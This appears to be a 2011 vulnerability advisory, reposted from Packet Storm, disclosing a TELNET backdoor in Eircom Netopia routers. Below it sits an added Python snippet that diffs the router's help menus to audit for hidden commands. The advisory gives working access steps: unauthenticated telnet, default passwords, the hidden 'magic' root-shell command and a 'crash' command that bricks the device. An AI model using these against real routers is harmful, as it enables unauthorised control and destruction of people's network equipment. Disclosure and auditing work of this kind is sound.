Eircom Netopia Router Backdoor

27 Mar 2011. Reported by Netcat. Type: packetstorm. Source: packetstormsecurity.com

Netopia SOC OS version 7.8.0 has a TELNET backdoor that enables root shell access without authentication: a hidden command, not listed in the help menu, spawns a new shell.

Code
`++++++++++++++++++++  
  
FULL DISCLOSURE OF EIRCOM NETOPIA ROUTER BACKDOOR VULNERABILITY!  
Yes, failcom suck, and they did it again. DERP!  
  
They gave us a nice TELNET shell into their routers, and now we can  
mess about 'cos it spawns a root shell by magic! (and magic is the  
actual command!)  
  
They also left a lovely web interface with supposed remote access  
capability, but I have to test that fully.  
  
Thanks to this, evil people could be hiding "in your switches  
rerouting your riches!"  
  
Disclosed by: Netcat, Hex, Chess.  
  
++++++++++++++++++++  
  
Netopia SOC OS version 7.8.0 has a simple TELNET backdoor.  
  
If a malicious attacker is on the local area network of a Netopia  
router, and they TELNET to 192.168.1.254 they are greeted with the  
following prompt... There is no password needed!  
  
++++++++++++++++++++  
  
Terminal shell v1.0  
Copyright ©2008 Motorola, Inc. All rights reserved.  
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed  
Switch  
Running Netopia SOC OS version 7.8.0 (build r2)  
Multimode ADSL Capable  
(Admin completed login: Full Read/Write access)  
  
Netopia-2000/146306722576>  
  
  
++++++++++++++++++++  
  
If it does ask for a passphrase, we found admin/admin and  
admin/password worked every time in the wild.  
  
At the 'Admin shell' a help command gives you the following menu...  
  
  
++++++++++++++++++++  
  
Netopia-2000/146306722576> help  
arp to send ARP request  
atmping to send ATM OAM loopback  
clear to erase all stored configuration  
information  
clear_certificate to clear stored SSL certificate  
clear_log to clear stored log data  
configure to configure unit's options  
diagnose to run self-test  
download to download config file  
exit to quit this shell  
help to get more: "help all" or "help help"  
hotspot to set or show hotspot authentication  
info  
install to download and program an image into  
flash  
license to enter an upgrade key to add a  
feature  
log to add a message to the diagnostic log  
loglevel to report or change diagnostic log  
level  
netstat to show IP information  
nslookup to send DNS query for host  
ping to send ICMP Echo request  
quit to quit this shell  
reset to reset subsystems  
restart to restart unit  
show to show system information  
start to start subsystem  
status to show basic status of unit  
telnet to telnet to a remote host  
traceroute to send traceroute probes  
upload to upload config file  
view to view configuration summary  
wan_type to Set WAN interface type  
who to show who is using the shell  
? to get help: "help all" or "help help"  
wps to issue Wireless Protected Setup  
commands  
  
Netopia-2000/146306722576>  
  
++++++++++++++++++++  
  
However, typing the command 'magic' (not listed) brings up a new  
shell...  
  
++++++++++++++++++++  
  
Netopia-2000/146306722576> magic  
(poof!)  
  
Netopia-2000/146306722576# help  
arp to send ARP request  
atmping to send ATM OAM loopback  
brcm to read/write broadcom switch  
clear to erase all stored configuration  
information  
clear_certificate to clear stored SSL certificate  
clear_log to clear stored log data  
configure to configure unit's options  
diagnose to run self-test  
download to download config file  
exit to quit this shell  
help to get more: "help all" or "help help"  
hotspot to set or show hotspot authentication  
info  
install to download and program an image into  
flash  
loopback to set the interface in loopback mode  
license to enter an upgrade key to add a  
feature  
log to add a message to the diagnostic log  
loglevel to report or change diagnostic log  
level  
netstat to show IP information  
nslookup to send DNS query for host  
ping to send ICMP Echo request  
quit to quit this shell  
reset to reset subsystems  
restart to restart unit  
rma_count to perform RMA functions  
show to show system information  
sslclient to send HTTPS request to the Server.  
Default Port is 433  
start to start subsystem  
status to show basic status of unit  
telnet to telnet to a remote host  
traceroute to send traceroute probes  
upload to upload config file  
view to view configuration summary  
wan_type to Set WAN interface type  
ata to issue commands related to remote  
ATA configuration  
who to show who is using the shell  
access_code to show if access code is valid  
bootflags to show or set the bootflags  
checksum to calculate and display the cksums  
console to make this session the console  
mem to display or edit system memory  
trace to toggle routing tracing  
crash to cause system death  
adsldebug to debug commands  
dsm to DSM commands  
set_language to set web display language  
peer-address to print IP address of this shell user  
? to get help: "help all" or "help help"  
wps to issue Wireless Protected Setup  
commands  
  
Netopia-2000/146306722576#  
  
+++++++++++++++++++++++  
  
The 'Crash' command literally bricks the router. This shell is the  
root shell.  
It gets even worse though... It has a lovely web  
interface if you open that web address in a browser!  
  
+++++++++++++++++++++++  
  
A malicious attacker on the LAN can do all kinds of things...  
  
+++++++++++++++++++++++  
  
ALL ROUTERS ISSUED BY EIRCOM THAT WE HAVE SEEN THUS FAR ARE  
VULNERABLE.  
THIS IS JUST AS BAD AS THEIR 'PREDICTABLE WEP KEY GENERATION  
ALGORITHM'.  
  
Not to mention, Eircom's default login is always:  
[email protected]  
broadband1  
  
+++++++++++++++++++++++  
  
Thanks for reading!  
  
soon to come... can we overflow bit torrent buffers?  
`
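Added example, not part of the original advisory: when auditing a device like this, diffing the documented help listing against the one shown after the hidden command gives a reviewable list of undocumented privileged commands. The sketch below parses two captured listings (constructed, abbreviated excerpts of the menus quoted above) and returns the commands that appear only in the second; the function names are hypothetical.

```python
import re

# Constructed, abbreviated excerpts of the two help listings quoted in the
# advisory; wrapped description lines are kept as they appear on the page.
USER_HELP = """\
arp to send ARP request
clear to erase all stored configuration
information
who to show who is using the shell
? to get help: "help all" or "help help"
"""
MAGIC_HELP = """\
arp to send ARP request
brcm to read/write broadcom switch
clear to erase all stored configuration
information
sslclient to send HTTPS request to the Server.
Default Port is 433
who to show who is using the shell
bootflags to show or set the bootflags
mem to display or edit system memory
crash to cause system death
? to get help: "help all" or "help help"
"""

# An entry reads "<command> to <description>". Any other line is treated as a
# wrapped continuation, so a bare entry such as "info" folds into the line above.
ENTRY = re.compile(r"^(\S+)\s+to\s+(.+)$")

def parse_menu(text):
    """Return {command: description} with wrapped lines joined to their entry."""
    menu, last = {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        match = ENTRY.match(line)
        if match:
            last = match.group(1)
            menu[last] = match.group(2)
        elif line and last is not None:
            menu[last] += " " + line
    return menu

def hidden_commands(user_text, privileged_text):
    """Commands present only in the privileged listing, in menu order."""
    user = parse_menu(user_text)
    return {c: d for c, d in parse_menu(privileged_text).items() if c not in user}

if __name__ == "__main__":
    for command, description in hidden_commands(USER_HELP, MAGIC_HELP).items():
        print(f"{command:<10} {description}")
```

Run against the full listings in the advisory, the same diff also surfaces entries such as `loopback`, `rma_count`, `ata`, `access_code`, `checksum`, `console`, `trace`, `adsldebug`, `dsm`, `set_language` and `peer-address`.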
